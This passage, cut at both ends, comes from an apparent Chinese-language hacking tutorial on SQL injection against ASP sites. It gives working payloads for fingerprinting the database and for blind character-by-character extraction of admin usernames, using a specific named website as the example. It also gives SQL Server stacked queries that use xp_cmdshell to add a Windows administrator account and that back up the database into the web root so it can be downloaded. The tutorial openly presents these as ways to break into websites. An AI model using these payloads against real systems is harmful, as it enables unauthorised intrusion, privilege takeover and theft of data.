msysobjects)&gt;0<br/>&#x5982;&#x679C;&#x6570;&#x636E;&#x5E93;&#x662F;SQLServer&#xFF0C;&#x90A3;&#x4E48;&#x7B2C;&#x4E00;&#x4E2A;&#x7F51;&#x5740;&#x7684;&#x9875;&#x9762;&#x4E0E;&#x539F;&#x9875;&#x9762;http://www.19cn.com/showdetail.asp?id=49&#x662F;&#x5927;&#x81F4;&#x76F8;&#x540C;&#x7684;&#xFF1B;&#x800C;&#x7B2C;&#x4E8C;&#x4E2A;&#x7F51;&#x5740;&#xFF0C;&#x7531;&#x4E8E;&#x627E;&#x4E0D;&#x5230;&#x8868;msysobjects&#xFF0C;&#x4F1A;&#x63D0;&#x793A;&#x51FA;&#x9519;&#xFF0C;&#x5C31;&#x7B97;&#x7A0B;&#x5E8F;&#x6709;&#x5BB9;&#x9519;&#x5904;&#x7406;&#xFF0C;&#x9875;&#x9762;&#x4E5F;&#x4E0E;&#x539F;&#x9875;&#x9762;&#x5B8C;&#x5168;&#x4E0D;&#x540C;&#x3002;<br/>&#x5982;&#x679C;&#x6570;&#x636E;&#x5E93;&#x7528;&#x7684;&#x662F;Access&#xFF0C;&#x90A3;&#x4E48;&#x60C5;&#x51B5;&#x5C31;&#x6709;&#x6240;&#x4E0D;&#x540C;&#xFF0C;&#x7B2C;&#x4E00;&#x4E2A;&#x7F51;&#x5740;&#x7684;&#x9875;&#x9762;&#x4E0E;&#x539F;&#x9875;&#x9762;&#x5B8C;&#x5168;&#x4E0D;&#x540C;&#xFF1B;&#x7B2C;&#x4E8C;&#x4E2A;&#x7F51;&#x5740;&#xFF0C;&#x5219;&#x89C6;&#x4E4E;&#x6570;&#x636E;&#x5E93;&#x8BBE;&#x7F6E;&#x662F;&#x5426;&#x5141;&#x8BB8;&#x8BFB;&#x8BE5;&#x7CFB;&#x7EDF;&#x8868;&#xFF0C;&#x4E00;&#x822C;&#x6765;&#x8BF4;&#x662F;&#x4E0D;&#x5141;&#x8BB8;&#x7684;&#xFF0C;&#x6240;&#x4EE5;&#x4E0E;&#x539F;&#x7F51;&#x5740;&#x4E5F;&#x662F;&#x5B8C;&#x5168;&#x4E0D;&#x540C;&#x3002;&#x5927;&#x591A;&#x6570;&#x60C5;&#x51B5;&#x4E0B;&#xFF0C;&#x7528;&#x7B2C;&#x4E00;&#x4E2A;&#x7F51;&#x5740;&#x5C31;&#x53EF;&#x4EE5;&#x5F97;&#x77E5;&#x7CFB;&#x7EDF;&#x6240;&#x7528;&#x7684;&#x6570;&#x636E;&#x5E93;&#x7C7B;&#x578B;&#xFF0C;&#x7B2C;&#x4E8C;&#x4E2A;&#x7F51;&#x5740;&#x53EA;&#x4F5C;&#x4E3A;&#x5F00;&#x542F;IIS&#x9519;&#x8BEF;&#x63D0;&#x793A;&#x65F6;&#x7684;&#x9A8C;&#x8BC1;&#x3002;<br/>&#x8FDB; &#x9636; &#x7BC7;<br/>&#x5728;&#x5165;&#x95E8;&#x7BC7;&#xFF0C;&#x6211;&#x4EEC;&#x5B66;&#x4F1A;&#x4E86;SQL&#x6CE8;&#x5165;&#x7684;&#x5224;&#x65AD;&#x65B9;&#x6CD5;&#xFF0C;&#x4F46;&#x771F;&#x6B63;&#x8981;&#x62FF;&#x5230;&#x7F51;&#x7AD9;&#x7684;&#x4FDD;&#x5BC6;&#x5185;&#x5BB9;&#xFF0C;&#x662F;&#x8FDC;&#x8FDC;&#x4E0D;&#x591F;&#x7684;&#x3002;&#x63A5;&#x4E0B;&#x6765;&#xFF0C;&#x6211;&#x4EEC;&#x5C31;&#x7EE7;&#x7EED;&#x5B66;&#x4E60;&#x5982;&#x4F55;&#x4ECE;&#x6570;&#x636E;&#x5E93;&#x4E2D;&#x83B7;&#x53D6;&#x60F3;&#x8981;&#x83B7;&#x5F97;&#x7684;&#x5185;&#x5BB9;&#xFF0C;&#x9996;&#x5148;&#xFF0C;&#x6211;&#x4EEC;&#x5148;&#x770B;&#x770B;SQL&#x6CE8;&#x5165;&#x7684;&#x4E00;&#x822C;&#x6B65;&#x9AA4;&#xFF1A;<br/>&#x7B2C;&#x4E00;&#x8282;&#x3001;SQL&#x6CE8;&#x5165;&#x7684;&#x4E00;&#x822C;&#x6B65;&#x9AA4;<br/>&#x9996;&#x5148;&#xFF0C;&#x5224;&#x65AD;&#x73AF;&#x5883;&#xFF0C;&#x5BFB;&#x627E;&#x6CE8;&#x5165;&#x70B9;&#xFF0C;&#x5224;&#x65AD;&#x6570;&#x636E;&#x5E93;&#x7C7B;&#x578B;&#xFF0C;&#x8FD9;&#x5728;&#x5165;&#x95E8;&#x7BC7;&#x5DF2;&#x7ECF;&#x8BB2;&#x8FC7;&#x4E86;&#x3002;<br/>&#x5176;&#x6B21;&#xFF0C;&#x6839;&#x636E;&#x6CE8;&#x5165;&#x53C2;&#x6570;&#x7C7B;&#x578B;&#xFF0C;&#x5728;&#x8111;&#x6D77;&#x4E2D;&#x91CD;&#x6784;SQL&#x8BED;&#x53E5;&#x7684;&#x539F;&#x8C8C;&#xFF0C;&#x6309;&#x53C2;&#x6570;&#x7C7B;&#x578B;&#x4E3B;&#x8981;&#x5206;&#x4E3A;&#x4E0B;&#x9762;&#x4E09;&#x79CD;&#xFF1A;<br/>(A)&nbsp;&nbsp;ID=49 &#x8FD9;&#x7C7B;&#x6CE8;&#x5165;&#x7684;&#x53C2;&#x6570;&#x662F;&#x6570;&#x5B57;&#x578B;&#xFF0C;SQL&#x8BED;&#x53E5;&#x539F;&#x8C8C;&#x5927;&#x81F4;&#x5982;&#x4E0B;&#xFF1A;<br/>Sel&#101;ct * from &#x8868;&#x540D; wh&#101;re &#x5B57;&#x6BB5;=49<br/>&#x6CE8;&#x5165;&#x7684;&#x53C2;&#x6570;&#x4E3A;ID=49 And [&#x67E5;&#x8BE2;&#x6761;&#x4EF6;]&#xFF0C;&#x5373;&#x662F;&#x751F;&#x6210;&#x8BED;&#x53E5;&#xFF1A;<br/>Sel&#101;ct * from &#x8868;&#x540D; wh&#101;re &#x5B57;&#x6BB5;=49 And [&#x67E5;&#x8BE2;&#x6761;&#x4EF6;]<br/>(B) Class=&#x8FDE;&#x7EED;&#x5267; &#x8FD9;&#x7C7B;&#x6CE8;&#x5165;&#x7684;&#x53C2;&#x6570;&#x662F;&#x5B57;&#x7B26;&#x578B;&#xFF0C;SQL&#x8BED;&#x53E5;&#x539F;&#x8C8C;&#x5927;&#x81F4;&#x6982;&#x5982;&#x4E0B;&#xFF1A;<br/>Sel&#101;ct * from &#x8868;&#x540D; wh&#101;re &#x5B57;&#x6BB5;=&#x2019;&#x8FDE;&#x7EED;&#x5267;&#x2019; <br/>&#x6CE8;&#x5165;&#x7684;&#x53C2;&#x6570;&#x4E3A;Class=&#x8FDE;&#x7EED;&#x5267;&#x2019; and [&#x67E5;&#x8BE2;&#x6761;&#x4EF6;] and &#x2018;&#x2019;=&#x2019; &#xFF0C;&#x5373;&#x662F;&#x751F;&#x6210;&#x8BED;&#x53E5;&#xFF1A;<br/>Sel&#101;ct * from &#x8868;&#x540D; wh&#101;re &#x5B57;&#x6BB5;=&#x2019;&#x8FDE;&#x7EED;&#x5267;&#x2019; and [&#x67E5;&#x8BE2;&#x6761;&#x4EF6;] and &#x2018;&#x2019;=&#x2019;&#x2019;<br/>(C) &#x641C;&#x7D22;&#x65F6;&#x6CA1;&#x8FC7;&#x6EE4;&#x53C2;&#x6570;&#x7684;&#xFF0C;&#x5982;keyword=&#x5173;&#x952E;&#x5B57;&#xFF0C;SQL&#x8BED;&#x53E5;&#x539F;&#x8C8C;&#x5927;&#x81F4;&#x5982;&#x4E0B;&#xFF1A;<br/>Sel&#101;ct * from &#x8868;&#x540D; wh&#101;re &#x5B57;&#x6BB5;like &#x2019;%&#x5173;&#x952E;&#x5B57;%&#x2019; <br/>&#x6CE8;&#x5165;&#x7684;&#x53C2;&#x6570;&#x4E3A;keyword=&#x2019; and [&#x67E5;&#x8BE2;&#x6761;&#x4EF6;] and &#x2018;%25&#x2019;=&#x2019;&#xFF0C; &#x5373;&#x662F;&#x751F;&#x6210;&#x8BED;&#x53E5;&#xFF1A;<br/>Sel&#101;ct * from &#x8868;&#x540D; wh&#101;re&#x5B57;&#x6BB5;like &#x2019;%&#x2019; and [&#x67E5;&#x8BE2;&#x6761;&#x4EF6;] and &#x2018;%&#x2019;=&#x2019;%&#x2019;<br/>&#x63A5;&#x7740;&#xFF0C;&#x5C06;&#x67E5;&#x8BE2;&#x6761;&#x4EF6;&#x66FF;&#x6362;&#x6210;SQL&#x8BED;&#x53E5;&#xFF0C;&#x731C;&#x89E3;&#x8868;&#x540D;&#xFF0C;&#x4F8B;&#x5982;&#xFF1A;<br/>ID=49 And (Sel&#101;ct Count(*) from Admin)&gt;=0<br/>&#x5982;&#x679C;&#x9875;&#x9762;&#x5C31;&#x4E0E;ID=49&#x7684;&#x76F8;&#x540C;&#xFF0C;&#x8BF4;&#x660E;&#x9644;&#x52A0;&#x6761;&#x4EF6;&#x6210;&#x7ACB;&#xFF0C;&#x5373;&#x8868;Admin&#x5B58;&#x5728;&#xFF0C;&#x53CD;&#x4E4B;&#xFF0C;&#x5373;&#x4E0D;&#x5B58;&#x5728;&#xFF08;&#x8BF7;&#x7262;&#x8BB0;&#x8FD9;&#x79CD;&#x65B9;&#x6CD5;&#xFF09;&#x3002;&#x5982;&#x6B64;&#x5FAA;&#x73AF;&#xFF0C;&#x76F4;&#x81F3;&#x731C;&#x5230;&#x8868;&#x540D;&#x4E3A;&#x6B62;&#x3002;<br/>&#x8868;&#x540D;&#x731C;&#x51FA;&#x6765;&#x540E;&#xFF0C;&#x5C06;Count(*)&#x66FF;&#x6362;&#x6210;Count(&#x5B57;&#x6BB5;&#x540D;)&#xFF0C;&#x7528;&#x540C;&#x6837;&#x7684;&#x539F;&#x7406;&#x731C;&#x89E3;&#x5B57;&#x6BB5;&#x540D;&#x3002;<br/>&#x6709;&#x4EBA;&#x4F1A;&#x8BF4;&#xFF1A;&#x8FD9;&#x91CC;&#x6709;&#x4E00;&#x4E9B;&#x5076;&#x7136;&#x7684;&#x6210;&#x5206;&#xFF0C;&#x5982;&#x679C;&#x8868;&#x540D;&#x8D77;&#x5F97;&#x5F88;&#x590D;&#x6742;&#x6CA1;&#x89C4;&#x5F8B;&#x7684;&#xFF0C;&#x90A3;&#x6839;&#x672C;&#x5C31;&#x6CA1;&#x5F97;&#x73A9;&#x4E0B;&#x53BB;&#x4E86;&#x3002;&#x8BF4;&#x5F97;&#x5F88;&#x5BF9;&#xFF0C;&#x8FD9;&#x4E16;&#x754C;&#x6839;&#x672C;&#x5C31;&#x4E0D;&#x5B58;&#x5728;100%&#x6210;&#x529F;&#x7684;&#x9ED1;&#x5BA2;&#x6280;&#x672F;&#xFF0C;&#x82CD;&#x8747;&#x4E0D;&#x53EE;&#x65E0;&#x7F1D;&#x7684;&#x86CB;&#xFF0C;&#x65E0;&#x8BBA;&#x591A;&#x6280;&#x672F;&#x591A;&#x9AD8;&#x6DF1;&#x7684;&#x9ED1;&#x5BA2;&#xFF0C;&#x90FD;&#x662F;&#x56E0;&#x4E3A;&#x522B;&#x4EBA;&#x7684;&#x7A0B;&#x5E8F;&#x5199;&#x5F97;&#x4E0D;&#x4E25;&#x5BC6;&#x6216;&#x4F7F;&#x7528;&#x8005;&#x4FDD;&#x5BC6;&#x610F;&#x8BC6;&#x4E0D;&#x591F;&#xFF0C;&#x624D;&#x6709;&#x5F97;&#x4E0B;&#x624B;&#x3002;<br/>&#x6709;&#x70B9;&#x8DD1;&#x9898;&#x4E86;&#xFF0C;&#x8BDD;&#x8BF4;&#x56DE;&#x6765;&#xFF0C;&#x5BF9;&#x4E8E;SQLServer&#x7684;&#x5E93;&#xFF0C;&#x8FD8;&#x662F;&#x6709;&#x529E;&#x6CD5;&#x8BA9;&#x7A0B;&#x5E8F;&#x544A;&#x8BC9;&#x6211;&#x4EEC;&#x8868;&#x540D;&#x53CA;&#x5B57;&#x6BB5;&#x540D;&#x7684;&#xFF0C;&#x6211;&#x4EEC;&#x5728;&#x9AD8;&#x7EA7;&#x7BC7;&#x4E2D;&#x4F1A;&#x505A;&#x4ECB;&#x7ECD;&#x3002;<br/>&#x6700;&#x540E;&#xFF0C;&#x5728;&#x8868;&#x540D;&#x548C;&#x5217;&#x540D;&#x731C;&#x89E3;&#x6210;&#x529F;&#x540E;&#xFF0C;&#x518D;&#x4F7F;&#x7528;SQL&#x8BED;&#x53E5;&#xFF0C;&#x5F97;&#x51FA;&#x5B57;&#x6BB5;&#x7684;&#x503C;&#xFF0C;&#x4E0B;&#x9762;&#x4ECB;&#x7ECD;&#x4E00;&#x79CD;&#x6700;&#x5E38;&#x7528;&#x7684;&#x65B9;&#x6CD5;&#xFF0D;Ascii&#x9010;&#x5B57;&#x89E3;&#x7801;&#x6CD5;&#xFF0C;&#x867D;&#x7136;&#x8FD9;&#x79CD;&#x65B9;&#x6CD5;&#x901F;&#x5EA6;&#x5F88;&#x6162;&#xFF0C;&#x4F46;&#x80AF;&#x5B9A;&#x662F;&#x53EF;&#x884C;&#x7684;&#x65B9;&#x6CD5;&#x3002;<br/>&#x6211;&#x4EEC;&#x4E3E;&#x4E2A;&#x4F8B;&#x5B50;&#xFF0C;&#x5DF2;&#x77E5;&#x8868;Admin&#x4E2D;&#x5B58;&#x5728;username&#x5B57;&#x6BB5;&#xFF0C;&#x9996;&#x5148;&#xFF0C;&#x6211;&#x4EEC;&#x53D6;&#x7B2C;&#x4E00;&#x6761;&#x8BB0;&#x5F55;&#xFF0C;&#x6D4B;&#x8BD5;&#x957F;&#x5EA6;&#xFF1A;<br/>http://www.19cn.com/showdetail.asp?id=49 and (sel&#101;ct top 1 len(username) from Admin)&gt;0<br/>&#x5148;&#x8BF4;&#x660E;&#x539F;&#x7406;&#xFF1A;&#x5982;&#x679C;top 1&#x7684;username&#x957F;&#x5EA6;&#x5927;&#x4E8E;0&#xFF0C;&#x5219;&#x6761;&#x4EF6;&#x6210;&#x7ACB;&#xFF1B;&#x63A5;&#x7740;&#x5C31;&#x662F;&gt;1&#x3001;&gt;2&#x3001;&gt;3&#x8FD9;&#x6837;&#x6D4B;&#x8BD5;&#x4E0B;&#x53BB;&#xFF0C;&#x4E00;&#x76F4;&#x5230;&#x6761;&#x4EF6;&#x4E0D;&#x6210;&#x7ACB;&#x4E3A;&#x6B62;&#xFF0C;&#x6BD4;&#x5982;&gt;7&#x6210;&#x7ACB;&#xFF0C;&gt;8&#x4E0D;&#x6210;&#x7ACB;&#xFF0C;&#x5C31;&#x662F;len(username)=8<br/>&#x5F53;&#x7136;&#x6CA1;&#x4EBA;&#x4F1A;&#x7B28;&#x5F97;&#x4ECE;0,1,2,3&#x4E00;&#x4E2A;&#x4E2A;&#x6D4B;&#x8BD5;&#xFF0C;&#x600E;&#x4E48;&#x6837;&#x624D;&#x6BD4;&#x8F83;&#x5FEB;&#x5C31;&#x770B;&#x5404;&#x81EA;&#x53D1;&#x6325;&#x4E86;&#x3002;&#x5728;&#x5F97;&#x5230;username&#x7684;&#x957F;&#x5EA6;&#x540E;&#xFF0C;&#x7528;mid(username,N,1)&#x622A;&#x53D6;&#x7B2C;N&#x4F4D;&#x5B57;&#x7B26;&#xFF0C;&#x518D;asc(mid(username,N,1))&#x5F97;&#x5230;ASCII&#x7801;&#xFF0C;&#x6BD4;&#x5982;&#xFF1A;<br/>id=49 and (sel&#101;ct top 1 asc(mid(username,1,1)) from Admin)&gt;0<br/>&#x540C;&#x6837;&#x4E5F;&#x662F;&#x7528;&#x9010;&#x6B65;&#x7F29;&#x5C0F;&#x8303;&#x56F4;&#x7684;&#x65B9;&#x6CD5;&#x5F97;&#x5230;&#x7B2C;1&#x4F4D;&#x5B57;&#x7B26;&#x7684;ASCII&#x7801;&#xFF0C;&#x6CE8;&#x610F;&#x7684;&#x662F;&#x82F1;&#x6587;&#x548C;&#x6570;&#x5B57;&#x7684;ASCII&#x7801;&#x5728;1-128&#x4E4B;&#x95F4;&#xFF0C;&#x53EF;&#x4EE5;&#x7528;&#x6298;&#x534A;&#x6CD5;&#x52A0;&#x901F;&#x731C;&#x89E3;&#xFF0C;&#x5982;&#x679C;&#x5199;&#x6210;&#x7A0B;&#x5E8F;&#x6D4B;&#x8BD5;&#xFF0C;&#x6548;&#x7387;&#x4F1A;&#x6709;&#x6781;&#x5927;&#x7684;&#x63D0;&#x9AD8;&#x3002;<br/>&#x7B2C;&#x4E8C;&#x8282;&#x3001;SQL&#x6CE8;&#x5165;&#x5E38;&#x7528;&#x51FD;&#x6570;<br/>&#x6709;SQL&#x8BED;&#x8A00;&#x57FA;&#x7840;&#x7684;&#x4EBA;&#xFF0C;&#x5728;SQL&#x6CE8;&#x5165;&#x7684;&#x65F6;&#x5019;&#x6210;&#x529F;&#x7387;&#x6BD4;&#x4E0D;&#x719F;&#x6089;&#x7684;&#x4EBA;&#x9AD8;&#x5F88;&#x591A;&#x3002;&#x6211;&#x4EEC;&#x6709;&#x5FC5;&#x8981;&#x63D0;&#x9AD8;&#x4E00;&#x4E0B;&#x81EA;&#x5DF1;&#x7684;SQL&#x6C34;&#x5E73;&#xFF0C;&#x7279;&#x522B;&#x662F;&#x4E00;&#x4E9B;&#x5E38;&#x7528;&#x7684;&#x51FD;&#x6570;&#x53CA;&#x547D;&#x4EE4;&#x3002;<br/>Access&#xFF1A;asc(&#x5B57;&#x7B26;)&nbsp;&nbsp;SQLServer&#xFF1A;unicode(&#x5B57;&#x7B26;)<br/>&#x4F5C;&#x7528;&#xFF1A;&#x8FD4;&#x56DE;&#x67D0;&#x5B57;&#x7B26;&#x7684;ASCII&#x7801;<br/>Access&#xFF1A;chr(&#x6570;&#x5B57;)&nbsp;&nbsp;SQLServer&#xFF1A;nchar(&#x6570;&#x5B57;)<br/>&#x4F5C;&#x7528;&#xFF1A;&#x4E0E;asc&#x76F8;&#x53CD;&#xFF0C;&#x6839;&#x636E;ASCII&#x7801;&#x8FD4;&#x56DE;&#x5B57;&#x7B26;<br/>Access&#xFF1A;mid(&#x5B57;&#x7B26;&#x4E32;,N,L)&nbsp;&nbsp;SQLServer&#xFF1A;substring(&#x5B57;&#x7B26;&#x4E32;,N,L)<br/>&#x4F5C;&#x7528;&#xFF1A;&#x8FD4;&#x56DE;&#x5B57;&#x7B26;&#x4E32;&#x4ECE;N&#x4E2A;&#x5B57;&#x7B26;&#x8D77;&#x957F;&#x5EA6;&#x4E3A;L&#x7684;&#x5B50;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x5373;N&#x5230;N+L&#x4E4B;&#x95F4;&#x7684;&#x5B57;&#x7B26;&#x4E32;<br/>Access&#xFF1A;abc(&#x6570;&#x5B57;)&nbsp;&nbsp;SQLServer&#xFF1A;abc (&#x6570;&#x5B57;)<br/>&#x4F5C;&#x7528;&#xFF1A;&#x8FD4;&#x56DE;&#x6570;&#x5B57;&#x7684;&#x7EDD;&#x5BF9;&#x503C;&#xFF08;&#x5728;&#x731C;&#x89E3;&#x6C49;&#x5B57;&#x7684;&#x65F6;&#x5019;&#x4F1A;&#x7528;&#x5230;&#xFF09;<br/>Access&#xFF1A;A between B And C&nbsp;&nbsp;SQLServer&#xFF1A;A between B And C<br/>&#x4F5C;&#x7528;&#xFF1A;&#x5224;&#x65AD;A&#x662F;&#x5426;&#x754C;&#x4E8E;B&#x4E0E;C&#x4E4B;&#x95F4;<br/>&#x7B2C;&#x4E09;&#x8282;&#x3001;&#x4E2D;&#x6587;&#x5904;&#x7406;&#x65B9;&#x6CD5;<br/>&#x5728;&#x6CE8;&#x5165;&#x4E2D;&#x78B0;&#x5230;&#x4E2D;&#x6587;&#x5B57;&#x7B26;&#x662F;&#x5E38;&#x6709;&#x7684;&#x4E8B;&#xFF0C;&#x6709;&#x4E9B;&#x4EBA;&#x4E00;&#x78B0;&#x5230;&#x4E2D;&#x6587;&#x5B57;&#x7B26;&#x5C31;&#x60F3;&#x6253;&#x9000;&#x5802;&#x9F13;&#x4E86;&#x3002;&#x5176;&#x5B9E;&#x53EA;&#x8981;&#x5BF9;&#x4E2D;&#x6587;&#x7684;&#x7F16;&#x7801;&#x6709;&#x6240;&#x4E86;&#x89E3;&#xFF0C;&#x201C;&#x4E2D;&#x6587;&#x6050;&#x60E7;&#x75C7;&#x201D;&#x5F88;&#x5FEB;&#x53EF;&#x4EE5;&#x514B;&#x670D;&#x3002;<br/>&#x5148;&#x8BF4;&#x4E00;&#x70B9;&#x5E38;&#x8BC6;&#xFF1A;<br/>Access&#x4E2D;&#xFF0C;&#x4E2D;&#x6587;&#x7684;ASCII&#x7801;&#x53EF;&#x80FD;&#x4F1A;&#x51FA;&#x73B0;&#x8D1F;&#x6570;&#xFF0C;&#x53D6;&#x51FA;&#x8BE5;&#x8D1F;&#x6570;&#x540E;&#x7528;abs()&#x53D6;&#x7EDD;&#x5BF9;&#x503C;&#xFF0C;&#x6C49;&#x5B57;&#x5B57;&#x7B26;&#x4E0D;&#x53D8;&#x3002;<br/>SQLServer&#x4E2D;&#xFF0C;&#x4E2D;&#x6587;&#x7684;ASCII&#x4E3A;&#x6B63;&#x6570;&#xFF0C;&#x4F46;&#x7531;&#x4E8E;&#x662F;UNICODE&#x7684;&#x53CC;&#x4F4D;&#x7F16;&#x7801;&#xFF0C;&#x4E0D;&#x80FD;&#x7528;&#x51FD;&#x6570;ascii()&#x53D6;&#x5F97;ASCII&#x7801;&#xFF0C;&#x5FC5;&#x987B;&#x7528;&#x51FD;&#x6570;unicode ()&#x8FD4;&#x56DE;unicode&#x503C;&#xFF0C;&#x518D;&#x7528;nchar&#x51FD;&#x6570;&#x53D6;&#x5F97;&#x5BF9;&#x5E94;&#x7684;&#x4E2D;&#x6587;&#x5B57;&#x7B26;&#x3002;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&#x4E86;&#x89E3;&#x4E86;&#x4E0A;&#x9762;&#x7684;&#x4E24;&#x70B9;&#x540E;&#xFF0C;&#x662F;&#x4E0D;&#x662F;&#x89C9;&#x5F97;&#x4E2D;&#x6587;&#x731C;&#x89E3;&#x5176;&#x5B9E;&#x4E5F;&#x8DDF;&#x82F1;&#x6587;&#x5DEE;&#x4E0D;&#x591A;&#x5462;&#xFF1F;&#x9664;&#x4E86;&#x4F7F;&#x7528;&#x7684;&#x51FD;&#x6570;&#x8981;&#x6CE8;&#x610F;&#x3001;&#x731C;&#x89E3;&#x8303;&#x56F4;&#x5927;&#x4E00;&#x70B9;&#x5916;&#xFF0C;&#x65B9;&#x6CD5;&#x662F;&#x6CA1;&#x4EC0;&#x4E48;&#x4E24;&#x6837;&#x7684;&#x3002;<br/>&#x9AD8; &#x7EA7; &#x7BC7;<br/>&#x770B;&#x5B8C;&#x5165;&#x95E8;&#x7BC7;&#x548C;&#x8FDB;&#x9636;&#x7BC7;&#x540E;&#xFF0C;&#x7A0D;&#x52A0;&#x7EC3;&#x4E60;&#xFF0C;&#x7834;&#x89E3;&#x4E00;&#x822C;&#x7684;&#x7F51;&#x7AD9;&#x662F;&#x6CA1;&#x95EE;&#x9898;&#x4E86;&#x3002;&#x4F46;&#x5982;&#x679C;&#x78B0;&#x5230;&#x8868;&#x540D;&#x5217;&#x540D;&#x731C;&#x4E0D;&#x5230;&#xFF0C;&#x6216;&#x7A0B;&#x5E8F;&#x4F5C;&#x8005;&#x8FC7;&#x6EE4;&#x4E86;&#x4E00;&#x4E9B;&#x7279;&#x6B8A;&#x5B57;&#x7B26;&#xFF0C;&#x600E;&#x4E48;&#x63D0;&#x9AD8;&#x6CE8;&#x5165;&#x7684;&#x6210;&#x529F;&#x7387;&#xFF1F;&#x600E;&#x4E48;&#x6837;&#x63D0;&#x9AD8;&#x731C;&#x89E3;&#x6548;&#x7387;&#xFF1F;&#x8BF7;&#x5927;&#x5BB6;&#x63A5;&#x7740;&#x5F80;&#x4E0B;&#x770B;&#x9AD8;&#x7EA7;&#x7BC7;&#x3002;<br/>&#x7B2C;&#x4E00;&#x8282;&#x3001;&#x5229;&#x7528;&#x7CFB;&#x7EDF;&#x8868;&#x6CE8;&#x5165;SQLServer&#x6570;&#x636E;&#x5E93;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SQLServer&#x662F;&#x4E00;&#x4E2A;&#x529F;&#x80FD;&#x5F3A;&#x5927;&#x7684;&#x6570;&#x636E;&#x5E93;&#x7CFB;&#x7EDF;&#xFF0C;&#x4E0E;&#x64CD;&#x4F5C;&#x7CFB;&#x7EDF;&#x4E5F;&#x6709;&#x7D27;&#x5BC6;&#x7684;&#x8054;&#x7CFB;&#xFF0C;&#x8FD9;&#x7ED9;&#x5F00;&#x53D1;&#x8005;&#x5E26;&#x6765;&#x4E86;&#x5F88;&#x5927;&#x7684;&#x65B9;&#x4FBF;&#xFF0C;&#x4F46;&#x53E6;&#x4E00;&#x65B9;&#x9762;&#xFF0C;&#x4E5F;&#x4E3A;&#x6CE8;&#x5165;&#x8005;&#x63D0;&#x4F9B;&#x4E86;&#x4E00;&#x4E2A;&#x8DF3;&#x677F;&#xFF0C;&#x6211;&#x4EEC;&#x5148;&#x6765;&#x770B;&#x770B;&#x51E0;&#x4E2A;&#x5177;&#x4F53;&#x7684;&#x4F8B;&#x5B50;&#xFF1A;<br/>&#x2460; http://Site/url.asp?id=1;exec master..xp_cmdshell &#x201C;net user name password /add&#x201D;--<br/>&#x3000;&#x3000;&#x5206;&#x53F7;;&#x5728;SQLServer&#x4E2D;&#x8868;&#x793A;&#x9694;&#x5F00;&#x524D;&#x540E;&#x4E24;&#x53E5;&#x8BED;&#x53E5;&#xFF0C;--&#x8868;&#x793A;&#x540E;&#x9762;&#x7684;&#x8BED;&#x53E5;&#x4E3A;&#x6CE8;&#x91CA;&#xFF0C;&#x6240;&#x4EE5;&#xFF0C;&#x8FD9;&#x53E5;&#x8BED;&#x53E5;&#x5728;SQLServer&#x4E2D;&#x5C06;&#x88AB;&#x5206;&#x6210;&#x4E24;&#x53E5;&#x6267;&#x884C;&#xFF0C;&#x5148;&#x662F;Sel&#101;ct&#x51FA;ID=1&#x7684;&#x8BB0;&#x5F55;&#xFF0C;&#x7136;&#x540E;&#x6267;&#x884C;&#x5B58;&#x50A8;&#x8FC7;&#x7A0B;xp_cmdshell&#xFF0C;&#x8FD9;&#x4E2A;&#x5B58;&#x50A8;&#x8FC7;&#x7A0B;&#x7528;&#x4E8E;&#x8C03;&#x7528;&#x7CFB;&#x7EDF;&#x547D;&#x4EE4;&#xFF0C;&#x4E8E;&#x662F;&#xFF0C;&#x7528;net&#x547D;&#x4EE4;&#x65B0;&#x5EFA;&#x4E86;&#x7528;&#x6237;&#x540D;&#x4E3A;name&#x3001;&#x5BC6;&#x7801;&#x4E3A;password&#x7684;windows&#x7684;&#x5E10;&#x53F7;&#xFF0C;&#x63A5;&#x7740;&#xFF1A;<br/>&#x2461; http://Site/url.asp?id=1;exec master..xp_cmdshell &#x201C;net localgroup name administrators /add&#x201D;--<br/>&#x3000;&#x3000;&#x5C06;&#x65B0;&#x5EFA;&#x7684;&#x5E10;&#x53F7;name&#x52A0;&#x5165;&#x7BA1;&#x7406;&#x5458;&#x7EC4;&#xFF0C;&#x4E0D;&#x7528;&#x4E24;&#x5206;&#x949F;&#xFF0C;&#x4F60;&#x5DF2;&#x7ECF;&#x62FF;&#x5230;&#x4E86;&#x7CFB;&#x7EDF;&#x6700;&#x9AD8;&#x6743;&#x9650;&#xFF01;&#x5F53;&#x7136;&#xFF0C;&#x8FD9;&#x79CD;&#x65B9;&#x6CD5;&#x53EA;&#x9002;&#x7528;&#x4E8E;&#x7528;sa&#x8FDE;&#x63A5;&#x6570;&#x636E;&#x5E93;&#x7684;&#x60C5;&#x51B5;&#xFF0C;&#x5426;&#x5219;&#xFF0C;&#x662F;&#x6CA1;&#x6709;&#x6743;&#x9650;&#x8C03;&#x7528;xp_cmdshell&#x7684;&#x3002;<br/>&#x2462; http://Site/url.asp?id=1 ;;and db_name()&gt;0<br/>&#x524D;&#x9762;&#x6709;&#x4E2A;&#x7C7B;&#x4F3C;&#x7684;&#x4F8B;&#x5B50;and user&gt;0&#xFF0C;&#x4F5C;&#x7528;&#x662F;&#x83B7;&#x53D6;&#x8FDE;&#x63A5;&#x7528;&#x6237;&#x540D;&#xFF0C;db_name()&#x662F;&#x53E6;&#x4E00;&#x4E2A;&#x7CFB;&#x7EDF;&#x53D8;&#x91CF;&#xFF0C;&#x8FD4;&#x56DE;&#x7684;&#x662F;&#x8FDE;&#x63A5;&#x7684;&#x6570;&#x636E;&#x5E93;&#x540D;&#x3002;<br/>&#x2463; http://Site/url.asp?id=1;backup database &#x6570;&#x636E;&#x5E93;&#x540D; to disk=&#x2019;c:\inetpub\wwwroot\1.db&#x2019;;--<br/>&#x8FD9;&#x662F;&#x76F8;&#x5F53;&#x72E0;&#x7684;&#x4E00;&#x62DB;&#xFF0C;&#x4ECE;&#x2462;&#x62FF;&#x5230;&#x7684;&#x6570;&#x636E;&#x5E93;&#x540D;&#xFF0C;&#x52A0;&#x4E0A;&#x67D0;&#x4E9B;IIS&#x51FA;&#x9519;&#x66B4;&#x9732;&#x51FA;&#x7684;&#x7EDD;&#x5BF9;&#x8DEF;&#x5F84;&#xFF0C;&#x5C06;&#x6570;&#x636E;&#x5E93;&#x5907;&#x4EFD;&#x5230;Web&#x76EE;&#x5F55;&#x4E0B;&#x9762;&#xFF0C;&#x518D;&#x7528;HTTP&#x628A;&#x6574;&#x4E2A;&#x6570;&#x636E;&#x5E93;&#x5C31;&#x5B8C;&#x5B8C;&#x6574;&#x6574;&#x7684;&#x4E0B;&#x8F7D;&#x56DE;&#x6765;&#xFF0C;&#x6240;&#x6709;&#x7